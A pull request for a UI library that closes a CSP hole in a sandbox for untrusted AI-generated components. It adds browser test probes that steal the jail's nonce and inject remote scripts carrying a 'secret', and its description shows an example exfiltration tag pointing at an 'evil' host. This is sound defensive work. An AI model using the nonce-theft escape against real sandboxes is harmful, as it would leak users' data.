### PR TITLE
fix(jail): script-src actually binds, so a sandboxed component cannot phone home

### DIFF
--- a/.changeset/jail-script-src-binds.md
+++ b/.changeset/jail-script-src-binds.md
@@ -1,0 +1,28 @@
+---
+"@vendoai/ui": patch
+---
+
+The jail's `script-src` actually binds, so a sandboxed component cannot phone
+home.
+
+The generated-component jail carried `script-src 'nonce-<N>' 'unsafe-eval'`, and
+the nonce was the hole. CSP blanks a nonce's content attribute but not its IDL
+property, so code running inside the jail — which is the untrusted code — could
+read the jail's own nonce off a script element and stamp it on a `<script src>`
+of its own. Browser-verified against the shipped policy: the request completed,
+foreign code executed in the jail, and the data in its URL left the browser. A
+nonce in `script-src` also makes `'unsafe-inline'` be ignored, so the directive's
+source list — deliberately empty — never governed anything.
+
+The policy is now `script-src 'unsafe-inline' 'unsafe-eval'`. Nothing about the
+jail is relaxed: `'unsafe-inline'` only permits inline script, which this
+document is entirely made of and which `'unsafe-eval'` already allowed the realm
+to produce, and with no nonce present the empty source list is finally the thing
+that decides. A component can no longer load a script from any origin, so the
+residual exfiltration risk — a shared or remixed component sending the data it
+was handed somewhere — is closed. `default-src 'none'`, `connect-src 'none'`,
+the opaque origin, and the `allow-scripts`-only sandbox are unchanged.
+
+Hosts are unaffected: an `about:srcdoc` frame also inherits the embedder's
+policy, and the jail boots (or does not) under exactly the same host policies as
+before.

--- a/packages/ui/e2e/exfil-probe.spec.ts
+++ b/packages/ui/e2e/exfil-probe.spec.ts
@@ -37,3 +37,39 @@ test("no exfiltration channel out of the jail: navigation, beacon, image", async
 
   expect(egressed, "generated code must not reach the network by ANY channel").toEqual([]);
 });
+
+/**
+ * The SCRIPT channel — the one `connect-src` does not govern and the frame
+ * nesting does not close. `script-src` is the only directive that can, and with
+ * a nonce in it, it could not: CSP blanks a nonce's content attribute but not
+ * its IDL property, so generated code read the jail's own nonce off a script
+ * element, stamped it on one it injected, and the request COMPLETED — foreign
+ * code executed in the jail and the secret in the URL left the browser. Now
+ * there is no nonce to steal and `script-src` names no source at all.
+ *
+ * Same discipline as above: the verdict is the wire plus the browser's own
+ * violation report, never a rejected promise (a request that left and 404'd
+ * rejects too, and `page.on("request")` fires even for CSP-blocked fetches).
+ */
+test("no exfiltration through the script channel: stolen nonce, remote script, runtime-composed import", async ({ page }) => {
+  const egressed: string[] = [];
+  page.on("response", r => { if (r.url().includes("exfil-target.js")) egressed.push(`response ${r.url()}`); });
+  page.on("requestfinished", r => { if (r.url().includes("exfil-target.js")) egressed.push(`finished ${r.url()}`); });
+
+  await openScenario(page, "tree-jail");
+  const jail = jailFrame(page, "SecurityProbe");
+  await expect(jail.getByRole("heading", { name: "Rendered generated props" })).toBeVisible();
+
+  // The escape that used to work. "nonce=none" is half the assertion: there is
+  // no nonce anywhere in the jail document for generated code to lift.
+  await jail.getByRole("button", { name: "Probe stolen nonce" }).click();
+  await expect(jail.locator("#stolen-nonce-status")).toHaveText("stolen nonce: FAILURE (CSP) nonce=none");
+  await jail.getByRole("button", { name: "Probe runtime import" }).click();
+  await expect(jail.locator("#runtime-import-status")).toHaveText("runtime import: FAILURE (CSP)");
+  await jail.getByRole("button", { name: "Probe remote script" }).click();
+  await expect(jail.locator("#remote-script-status")).toHaveText("remote script: FAILURE (CSP)");
+  await expect(jail.locator("#csp-violations")).toContainText("script-src-elem");
+
+  await page.waitForTimeout(1_500);
+  expect(egressed, "no module fetch may leave the jail").toEqual([]);
+});

--- a/packages/ui/e2e/harness/main.tsx
+++ b/packages/ui/e2e/harness/main.tsx
@@ -361,13 +361,17 @@ const components: Record<string, ComponentType> = {
 const tree = browserTreeFixture;
 
 const securitySource = String.raw`
-import React, { useState } from "react";
+import React, { useEffect, useState } from "react";
 
-export default function SecurityProbe({ label, onRun }) {
+export default function SecurityProbe({ label, onRun, exfilOrigin }) {
   const [fetchStatus, setFetchStatus] = useState("not run");
   const [xhrStatus, setXhrStatus] = useState("not run");
   const [socketStatus, setSocketStatus] = useState("not run");
   const [importStatus, setImportStatus] = useState("not run");
+  const [runtimeImportStatus, setRuntimeImportStatus] = useState("not run");
+  const [remoteScriptStatus, setRemoteScriptStatus] = useState("not run");
+  const [stolenNonceStatus, setStolenNonceStatus] = useState("not run");
+  const [violations, setViolations] = useState([]);
   const [parentStatus, setParentStatus] = useState("not run");
   const [actionStatus, setActionStatus] = useState("not run");
   const [navigateStatus, setNavigateStatus] = useState("not run");
@@ -408,13 +412,54 @@ export default function SecurityProbe({ label, onRun }) {
     }
   }
 
+  // A written import() is rewritten by sucrase into the jail's own require, so
+  // it never becomes a module fetch at all. That is the LOADER refusing an
+  // unknown specifier, not CSP — the two mechanisms are asserted separately
+  // because a source rewrite cannot see code built at runtime (below).
   async function probeImport() {
     try {
       await import("https://example.com/mod.js");
       setImportStatus("UNEXPECTED SUCCESS");
     } catch {
-      setImportStatus("FAILURE (CSP)");
+      setImportStatus("FAILURE (jail require)");
     }
+  }
+
+  // The escape a source rewrite cannot reach: the import URL is composed at
+  // runtime, so sucrase never sees it and only script-src can stop it. Every
+  // probe below targets a REAL module on a real origin, so "UNEXPECTED SUCCESS"
+  // means foreign code actually ran in here — not that a request 404'd.
+  const exfilUrl = suffix => exfilOrigin + "/exfil-target.js?" + suffix + "=" + encodeURIComponent(label);
+
+  async function probeRuntimeImport() {
+    try {
+      await new Function("url", "return import(url)")(exfilUrl("import-secret"));
+      setRuntimeImportStatus("UNEXPECTED SUCCESS");
+    } catch {
+      setRuntimeImportStatus("FAILURE (CSP)");
+    }
+  }
+
+  // The escape that actually works: CSP blanks a nonce's content ATTRIBUTE but
+  // the IDL property survives, so same-document code can read the jail's own
+  // nonce off any script element and stamp it on one it injects.
+  function probeStolenNonce() {
+    const stolen = document.querySelector("script")?.nonce ?? "";
+    const tag = document.createElement("script");
+    tag.nonce = stolen;
+    tag.onload = () => setStolenNonceStatus("UNEXPECTED SUCCESS nonce=" + (stolen === "" ? "none" : "stolen"));
+    tag.onerror = () => setStolenNonceStatus("FAILURE (CSP) nonce=" + (stolen === "" ? "none" : "stolen"));
+    tag.src = exfilUrl("nonce-secret");
+    document.head.appendChild(tag);
+  }
+
+  // A classic script element: the other half of what an empty source list denies.
+  function probeRemoteScript() {
+    const tag = document.createElement("script");
+    tag.onload = () => setRemoteScriptStatus("UNEXPECTED SUCCESS");
+    tag.onerror = () => setRemoteScriptStatus("FAILURE (CSP)");
+    tag.src = exfilUrl("script-secret");
+    document.head.appendChild(tag);
   }
 
   function probeParent() {
@@ -458,6 +503,14 @@ export default function SecurityProbe({ label, onRun }) {
     setActionStatus("delivered");
   }
 
+  // The block is asserted from the browser's own report, not only from a caught
+  // rejection: a rejected import could mean the request left and then 404'd.
+  useEffect(() => {
+    const record = event => setViolations(seen => [...seen, event.effectiveDirective]);
+    document.addEventListener("securitypolicyviolation", record);
+    return () => document.removeEventListener("securitypolicyviolation", record);
+  }, []);
+
   return <section
     aria-label="Generated security probe"
     style={{ minHeight: "100vh", paddingBottom: 40 }}
@@ -478,6 +531,13 @@ export default function SecurityProbe({ label, onRun }) {
     <output id="socket-status">socket: {socketStatus}</output>
     <button type="button" onClick={probeImport}>Probe import</button>
     <output id="import-status">import: {importStatus}</output>
+    <button type="button" onClick={probeRuntimeImport}>Probe runtime import</button>
+    <output id="runtime-import-status">runtime import: {runtimeImportStatus}</output>
+    <button type="button" onClick={probeStolenNonce}>Probe stolen nonce</button>
+    <output id="stolen-nonce-status">stolen nonce: {stolenNonceStatus}</output>
+    <button type="button" onClick={probeRemoteScript}>Probe remote script</button>
+    <output id="remote-script-status">remote script: {remoteScriptStatus}</output>
+    <output id="csp-violations">violations: {violations.join(",")}</output>
     <button type="button" onClick={probeParent}>Probe parent DOM</button>
     <output id="parent-status">parent: {parentStatus}</output>
     <button type="button" onClick={dispatch}>Dispatch action</button>
@@ -570,6 +630,10 @@ const jailTree: UIPayload & { furnishings: Record<string, unknown> } = {
       props: {
         label: "Rendered generated props",
         onRun: { $action: "fn:secure-submit", payload: { invoiceId: "inv_42" } },
+        // A real, reachable origin that is nonetheless NOT in the jail's
+        // script-src (nothing is): the module-loader probes need a target whose
+        // "LOADED" is unambiguous, and the harness is the honest one to use.
+        exfilOrigin: location.origin,
       },
     },
     {

--- a/packages/ui/e2e/harness/public/exfil-target.js
+++ b/packages/ui/e2e/harness/public/exfil-target.js
@@ -1,0 +1,7 @@
+// An off-allowlist module the jail must never be able to load. Served by the
+// harness itself so the proof needs no third-party network: a real origin, real
+// JS MIME type, so "LOADED" means the jail truly reached a module loader and
+// executed foreign code — not that a request 404'd. The secret rides in the
+// query string, which is what a real exfiltration would do.
+globalThis.__vendoExfilLoaded = true;
+export default "exfiltrated";

--- a/packages/ui/e2e/jail-and-tree.spec.ts
+++ b/packages/ui/e2e/jail-and-tree.spec.ts
@@ -18,7 +18,10 @@ test("generated components stay in the opaque-origin CSP jail and actions cross 
   await jail.getByRole("button", { name: "Probe fetch" }).click();
   await expect(jail.locator("#fetch-status")).toHaveText("fetch: FAILURE (CSP)");
   await jail.getByRole("button", { name: "Probe import" }).click();
-  await expect(jail.locator("#import-status")).toHaveText("import: FAILURE (CSP)");
+  // Not CSP: sucrase rewrote the written import into the jail's own require.
+  // The directive that stops an import CSP alone must catch is proven in
+  // exfil-probe.spec.ts.
+  await expect(jail.locator("#import-status")).toHaveText("import: FAILURE (jail require)");
   await jail.getByRole("button", { name: "Probe parent DOM" }).click();
   await expect(jail.locator("#parent-status")).toHaveText("parent: FAILURE (opaque origin)");
   expect(escapedRequests, "CSP must stop example.com before a browser request leaves").toEqual([]);

--- a/packages/ui/src/tree/jail/JailedComponent.tsx
+++ b/packages/ui/src/tree/jail/JailedComponent.tsx
@@ -26,17 +26,32 @@ const MAX_JAIL_HEIGHT = 8_192;
  * runs no untrusted code; it is a message relay, so the host's postMessage
  * identity check (source === iframe.contentWindow) still holds end to end.
  *
- * `'unsafe-eval'` is deliberate: evaluation is the jail's job (generated code
- * loads through the runtime's controlled `require`, which exposes only React,
- * so no import form can reach the module loader). NETWORK is what the jail
- * forbids, and `blob:` is banned from script-src because blob-ESM made the
- * loader reachable.
+ * `'unsafe-eval'` is deliberate: evaluation is the jail's job. What the jail
+ * forbids is NETWORK — and `script-src` is the only directive that governs the
+ * one channel `connect-src` misses, a SCRIPT the realm loads and runs. Its
+ * source list is empty, so that channel is shut.
+ *
+ * `'unsafe-inline'` rather than a nonce, and that is the security property, not
+ * a relaxation. A nonce is worthless against code running INSIDE the document
+ * that carries it, which is exactly what this document is: CSP blanks a nonce's
+ * content attribute but not its IDL property, so
+ * `document.querySelector("script").nonce` hands generated code the jail's own
+ * nonce, and a `<script src>` it stamps with that nonce is allowed from any
+ * origin. Browser-verified against the old `script-src 'nonce-N' 'unsafe-eval'`:
+ * the request COMPLETED, foreign code ran here, and the data in its URL left
+ * the browser. (A nonce also propagates to modules `import()`ed by the script
+ * that carries it, and it makes `'unsafe-inline'` be ignored — so the nonce was
+ * costing the source list its authority and buying nothing: the srcdoc is
+ * entirely ours, generated source arrives over postMessage rather than in the
+ * HTML, so there is no injection here for a nonce to stop, and the realm may
+ * already evaluate anything it composes.) With no nonce, the SOURCE LIST
+ * governs, and it is empty. `blob:` and `data:` stay out of it for the same
+ * reason: both are transports that reach the loader.
  */
 function buildJailSrcdoc(): string {
-  const nonce = jailNonce();
   const csp = [
     "default-src 'none'",
-    `script-src 'nonce-${nonce}' 'unsafe-eval'`,
+    "script-src 'unsafe-inline' 'unsafe-eval'",
     "style-src 'unsafe-inline'",
     "img-src data:",
     "font-src data:",
@@ -54,7 +69,7 @@ function buildJailSrcdoc(): string {
     "<!doctype html><html lang=\"en\"><head>",
     head,
     "<title>Generated Vendo component</title></head><body>",
-    `<script nonce="${nonce}">${safeRuntime}<\/script>`,
+    `<script>${safeRuntime}<\/script>`,
     "</body></html>",
   ].join("");
 
@@ -75,17 +90,9 @@ window.addEventListener("message", function (event) {
     "<!doctype html><html lang=\"en\"><head>",
     head,
     "<title>Vendo jail</title></head><body>",
-    `<script nonce="${nonce}">${relay}<\/script>`,
+    `<script>${relay}<\/script>`,
     "</body></html>",
   ].join("");
-}
-
-/** A per-mount nonce. Not a secret: the srcdoc is fully ours (generated source
- *  never enters the HTML — it arrives over postMessage), so a non-crypto
- *  fallback keeps the jail working in non-secure contexts. */
-function jailNonce(): string {
-  const random = globalThis.crypto?.randomUUID?.();
-  return (random ?? `${Date.now().toString(36)}${Math.random().toString(36).slice(2)}`).replaceAll("-", "");
 }
 
 export interface JailedComponentProps {

--- a/packages/ui/src/tree/jail/runtime-entry.tsx
+++ b/packages/ui/src/tree/jail/runtime-entry.tsx
@@ -212,11 +212,18 @@ const KIT_MODULE_EXPORTS = {
 
 /**
  * The ONLY modules generated code can reach. Sucrase's `imports` transform
- * rewrites every static AND dynamic `import` into a call to this `require`,
- * so no module-loader network fetch can ever be expressed — the browser-
- * verified escape (a blob-ESM `import("https://…")` initiating a request
- * despite `script-src`) is closed at the loader itself, and `script-src`
- * carries no `blob:`/host sources as the second wall.
+ * rewrites every static AND dynamic `import` in the SOURCE into a call to this
+ * `require`, so no import form a component writes can express a network fetch.
+ *
+ * That rewrite is a source-level gate, not a security boundary: code the
+ * transform cannot see — `new Function("u", "return import(u)")`, or an
+ * injected `<script src>` — walks straight past it. The boundary is
+ * `script-src`, which names no source expression (no host, no `blob:`, no
+ * `data:`), so nothing here can fetch a script from anywhere. It only became
+ * one when the nonce came out of that directive: a nonce is readable from the
+ * DOM by the very code it is meant to constrain, so generated code could stamp
+ * its own remote `<script>` with it (browser-verified — see
+ * e2e/exfil-probe.spec.ts).
  *
  * Keyed by `IslandResolvableModule` (the shared allowlist in @vendoai/core —
  * react, the kit-ish specifiers the engine strips, and the bundled third-party

--- a/packages/ui/test/tree/frames-and-jail.test.tsx
+++ b/packages/ui/test/tree/frames-and-jail.test.tsx
@@ -242,6 +242,13 @@ describe("generated component jail structure", () => {
     expect(iframe.srcdoc).toContain('http-equiv="Content-Security-Policy"');
     expect(iframe.srcdoc).toContain("default-src 'none'");
     expect(iframe.srcdoc).toContain("connect-src 'none'");
+    // No nonce, ever. Generated code shares this document, so it can read a
+    // nonce off a script element and stamp its own remote <script> with it —
+    // and a nonce in script-src also makes `'unsafe-inline'` be ignored. Only
+    // with no nonce does the (empty) source list actually govern.
+    expect(iframe.srcdoc).toContain("script-src 'unsafe-inline' 'unsafe-eval'");
+    expect(iframe.srcdoc).not.toContain("'nonce-");
+    expect(iframe.srcdoc).not.toMatch(/<script[^>]*nonce/);
     expect((globalThis as Record<string, unknown>).__vendoHostExecuted).toBeUndefined();
     expect(document.querySelector("script")).toBeNull();
     expect(evalSpy).not.toHaveBeenCalled();


### PR DESCRIPTION
The jail renders untrusted, AI-generated components. Its comments claimed
`script-src` was a "second wall" keeping that code off the network. It was not a
wall at all — measured in a real browser against the exact shipped policy, a
generated component could load and run a script from **any origin**, which means
it could send the data it was handed anywhere.

The host page was never at risk (opaque origin, no same-origin access, no
cookies — all of that holds). The exposure was **exfiltration**, and it matters
most on the path where a shared or remixed component renders for a *different*
user with *their* data. Remix review is a partial control today; this closes the
channel itself.

## 1 — The mechanism: why a nonce defeated the directive

`script-src`'s source list was empty by design — nothing may be loaded. A nonce
in the same directive made that list irrelevant, two ways:

**A nonce is not a secret from the code it is meant to constrain.** CSP blanks a
nonce's content *attribute*, but the IDL property survives, and generated code
runs in the very document that carries it. One line:

```js
document.querySelector("script").nonce   // → the jail's own nonce
```

Stamp that on an injected `<script src="https://evil/?secret=…">` and it is
allowed from any origin. Browser-verified in the real jail, before this PR — the
request **completed**, foreign code executed inside the jail, and the secret in
the URL left the browser.

**A nonce also makes `'unsafe-inline'` be ignored** (CSP3), so as long as it was
present, the source list could never be the thing that decided.

Both facts point the same way: the nonce was buying nothing here. The srcdoc is
entirely ours, and generated source never enters it — it arrives over
postMessage — so there is no injection for a nonce to stop, and the realm may
already evaluate anything it composes (`'unsafe-eval'` is the jail's whole job).

### Options considered

| option | verdict |
| --- | --- |
| **`'unsafe-inline'`** (taken) | permits only inline script — which this document is entirely made of, and which `'unsafe-eval'` already allowed the realm to produce. With no nonce, the empty source list governs. |
| hashes | would also close it (a dynamic import carries no integrity metadata, so a hash cannot propagate the way a nonce does), but needs `crypto.subtle` — async, and unavailable in the non-secure contexts the jail supports — and would have to cover #771's import map, which is generated *inside* the jail at runtime. |
| bootstrap out of inline script | impossible: an `about:srcdoc` frame has no URL to load from, and an external one would need the network we are denying. |
| stricter `default-src` | already `'none'`; `script-src` is explicitly present, so it does not fall back. |

## 2 — The policy, verbatim

**Before**

```
default-src 'none'; script-src 'nonce-<N>' 'unsafe-eval'; style-src 'unsafe-inline'; img-src data:; font-src data:; connect-src 'none'
```

**After**

```
default-src 'none'; script-src 'unsafe-inline' 'unsafe-eval'; style-src 'unsafe-inline'; img-src data:; font-src data:; connect-src 'none'
```

One directive changed. `default-src 'none'` and `connect-src 'none'` are
untouched, as are the opaque origin, the `allow-scripts`-only sandbox, and the
nested-frame `frame-src` block. `blob:` and `data:` stay absent.

The one behavioural delta is that an injected *inline* `<script>` now runs where
a nonce blocked it. It grants the realm nothing: `'unsafe-eval'` already let it
execute any code it can compose, and inline script opens no network channel.

## 3 — Browser proof, failing before and blocked after

`packages/ui/e2e/exfil-probe.spec.ts` — real Chromium, the shipped renderer, a
real ES module served on a real origin so "LOADED" is unambiguous.

**Before (this spec on `main`'s jail):**

```
stolen nonce: UNEXPECTED SUCCESS nonce=stolen
wire: finished http://127.0.0.1:53006/exfil-target.js?nonce-secret=Rendered%20generated%20props
```

The request **finished** — bytes on the wire, the secret in the query string,
foreign code executed in the jail.

**After:**

```
stolen nonce:   FAILURE (CSP) nonce=none
runtime import: FAILURE (CSP)
remote script:  FAILURE (CSP)
violations:     script-src-elem ×6
wire: failed csp …?import-secret=…   failed csp …?nonce-secret=…   failed csp …?script-secret=…
```

The assertion is the **negative**, on the wire plus the browser's own
`securitypolicyviolation` report — deliberately not on a rejected promise, and
deliberately not on `page.on("request")`, which fires for CSP-blocked fetches
too (that trap cost a measurement round here; the existing spec already knew it
for beacons).

`nonce=none` is half the assertion: there is no nonce anywhere in the jail
document left to lift.

## 4 — How this composes with #771

Cherry-picked #771 (`ec4dddfee`) onto this branch and ran it. **One conflicting
line, and all four of #771's browser tests pass on the composed tree**, including
the real recharts draw from `esm.sh`.

Composed directive:

```ts
const scriptSources = loadsPackages ? ` ${JAIL_PACKAGE_CDN_ORIGIN} data:` : "";
`script-src 'unsafe-inline' 'unsafe-eval'${scriptSources}`
```

- **Production / remix fork** (no packages declared): `script-src 'unsafe-inline'
  'unsafe-eval'` — can fetch nothing.
- **Console preview with pins**: `… 'unsafe-eval' https://esm.sh data:` — that
  one origin and nothing else.

Whoever rebases second, here is the whole job:

1. `packages/ui/src/tree/jail/JailedComponent.tsx` — take both sides: my
   `'unsafe-inline'` in place of the nonce, #771's `${scriptSources}` suffix and
   `loadsPackages` parameter.
2. `packages/ui/test/tree/jail-cdn-packages.test.tsx` — two assertions hard-code
   the nonce and must drop it (verified: these two, and only these two):
   - L36 `/^script-src 'nonce-[a-z0-9]+' 'unsafe-eval'$/u` → `/^script-src 'unsafe-inline' 'unsafe-eval'$/u`
   - L50 `/^script-src 'nonce-[a-z0-9]+' 'unsafe-eval' https:\/\/esm\.sh data:$/u` → same, `'unsafe-inline'` for the nonce
   - L42–43's nonce-normalisation becomes a no-op and can go.
3. `packages/ui/src/tree/jail/runtime-entry.tsx` — #771's `scriptNonce` (read off
   `document.currentScript.nonce` to stamp the import map) becomes vestigial. It
   is *harmless*: it resolves to `""`, and under `'unsafe-inline'` the injected
   import map runs anyway — proven by #771's own CDN tests passing here. Worth
   deleting for tidiness, not for correctness.

#771's e2e assertions read the nonce out of the mounted directive dynamically,
so they are already nonce-agnostic and needed no change.

## 5 — The corrected comments and probe

- `JailedComponent.tsx` — the block said generated code "loads through the
  runtime's controlled `require`, so no import form can reach the module loader"
  and that `script-src` carried the ban as a second wall. Now: the rewrite is a
  source-level gate, `script-src` is the boundary, and the nonce is why it was
  not one.
- `runtime-entry.tsx` — same false "second wall" claim on `JAIL_MODULES`,
  corrected the same way, pointing at the spec that proves it.
- **The mislabelled probe.** `import: FAILURE (CSP)` was wrong — sucrase rewrites
  a written `import()` into the jail's own `require`, so it never becomes a
  module fetch at all. It now reads `FAILURE (jail require)` and says which
  mechanism it is testing, with the CSP-only channels asserted separately.

## 6 — Nothing regressed

- **`@vendoai/ui` unit: 766/766.** Includes a new lock in
  `frames-and-jail.test.tsx` — the srcdoc must carry
  `script-src 'unsafe-inline' 'unsafe-eval'` and no nonce anywhere, so this
  cannot silently come back.
- **Jail-touching browser specs, all green:** `exfil-probe` (7), `jail-and-tree`
  (captured sub-components, root CSS, sample props, the raw-form intercept, the
  height chain), `inclient` (the same source in the host page and dropped back to
  the jail), `pin-drift`, `theme`, `byo-embeds`, `height-chain`. The postMessage
  handshake is what every one of these rides on.
- **Inherited policy — checked, because it would break customers.** An
  `about:srcdoc` frame also inherits the *embedder's* CSP. Measured across four
  host policies; the jail boots (or does not) identically before and after:

  | host page policy | nonce jail | `'unsafe-inline'` jail |
  | --- | --- | --- |
  | no CSP | BOOTED | BOOTED |
  | `script-src 'unsafe-inline' 'unsafe-eval'` | BOOTED | BOOTED |
  | `script-src 'nonce-host' 'unsafe-eval'` | BLOCKED | BLOCKED |
  | `script-src 'self'` | BLOCKED | BLOCKED |

  (The bottom two rows are a pre-existing limitation this PR neither creates nor
  fixes: a host page with a strict `script-src` cannot run the jail today.)

## 7 — Gates

`pnpm build` ✅ · `pnpm typecheck` ✅ 43/43 · `pnpm lint` ✅ 6/6 forced ·
`pnpm test` ✅ **55/55** — the `automations-e2e` distDir flake (#772) did not
fire on this run.

**`pnpm --filter @vendoai/ui test:browser`: 99 passed, 20 failed — all 20
pre-existing.** Not assumed: I stashed this branch, rebuilt, and ran the same
eight spec files on a clean `origin/main` tree — the failing list is
byte-identical (accessibility ×2, chrome-behavior ×5, containment pin-mount,
eng-222, keyboard ×7, screenshots ×2, verification-eng225, wave3-consumer-voice).
No jail spec among them. Same 20 #771 reports.

**All 10 CI checks pass**, `audit` included — the pre-existing dependency-advisory
backlog I was warned about must have been cleared by its own lane, so it did not
block this PR after all.

## 8 — What widened

The finding I was handed was "a nonce propagates to dynamically imported
modules". That is true — measured, a `new Function`-composed `import()` inside a
directly-nonced inline script loads from any origin — but it is **not** the path
that was open in the jail, where the generated code sits two `new Function`
levels deep and that inheritance does not reach. The channel that *was* open, and
that this PR closes, is the simpler and more general one: **the nonce is readable
from the DOM by the code it is supposed to constrain.** Any design that puts a
nonce in a policy governing a realm that runs untrusted code has the same
problem.
